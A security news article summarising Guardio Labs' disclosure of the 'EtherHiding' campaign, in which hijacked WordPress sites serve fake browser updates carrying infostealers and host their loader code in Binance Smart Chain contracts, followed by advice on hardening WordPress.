A new malware campaign called “EtherHiding” has emerged, which uses Binance’s Smart Chain contracts to host parts of a malicious code chain. Guardio researchers have revealed the risks associated with this malicious attack, represents a novel approach that threat actors are employing to carry out cyberattacks using smart contracts.
Nati Tal and Oleg Zaytsev of Guardio Labs disclosed that:
“EtherHiding presents a novel twist on serving malicious code by utilizing Binance’s Smart Chain contracts to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting.”
The EtherHiding campaign starts, by threat actors hijacking vulnerable WordPress sites and tricking users into downloading fake browser updates that are actually malware.
Nati and Oleg describes the situation stating that:
“Over the last two months, threat actors have been leveraging a vast array of hijacked WordPress sites, this threat actors has misled users into downloading malicious fake “browser updates”.
Further steps utilized by these attackers include hosting the code on Cloudflare Worker hosts, but they quickly switched to using the decentralized web and anonymous nature of blockchain to host their malicious code, after the Cloudflare worker hosts was taken down.
Guardio researched hinted that:
“While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they’ve quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain. This campaign is up and harder.”
THE FAKE BROWSER CAMPAIGN TRICK:
Guardio Labs described the “fake browser update” EtherHiding campaign as one that has been ongoing for the last two months. Threat actors utilize this campaign to propagate malware with the sole intent of infecting their victims. The threat actor utilized a website they have defaced to run an overlay browser update before the site can be displayed (usually, this may be a site that an unsuspecting victim usually visits). Unbeknownst to the victim, the malicious update consists of an infostealer malware in the category of Amadey, Lumma, or RedLine.
Employing this approach allows the threat actor to remotely alter the malicious code, adjusting tactics, updating blocked domains, replacing detected payloads, all without needing to re-access the WordPress site. Furthermore, they can display any desired message.
THE EVOLUTION OF CLEARFAKE USING BINANCE:
A fresh contract instance is generated and subsequently initialized with the attacker’s controlled blockchain address and Application Binary Interface (ABI), which specifies the contract’s functions and structure.
MITIGATING THE ISSUE: A CHALLENGE:
Mitigating this issue presents a challenge because of the decentralized nature of blockchain systems. Once a smart contract is deployed, it operates autonomously, meaning it cannot be simply shut down by Binance. Instead, the available recourse is to provide a temporary solution, which involves notifying the community about a potentially malicious or illicitly used contract. The address which has been identified as “Fake_Phishing2561” is still notable online, and delivers the malicious payload.
Researchers at Guardio emphasized that:
“Apparently as of today, there is no way to stop it. A critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims.”
Summarizing the event:
Utilizing blockchain technology enables attackers to host their code in an unblockable manner. This campaign underscores the significant threat posed by hosting malicious code on the blockchain for nefarious purposes. To safeguard WordPress sites, the most effective approach involves consistent WordPress infrastructure and plugin updates, securing credentials, employing strong and regularly changing passwords. Researchers at Guardio also listed the IoC’s (Indicator Of Compromise) on its blog post.
Please do let us know in the comment section what are your thoughts about this.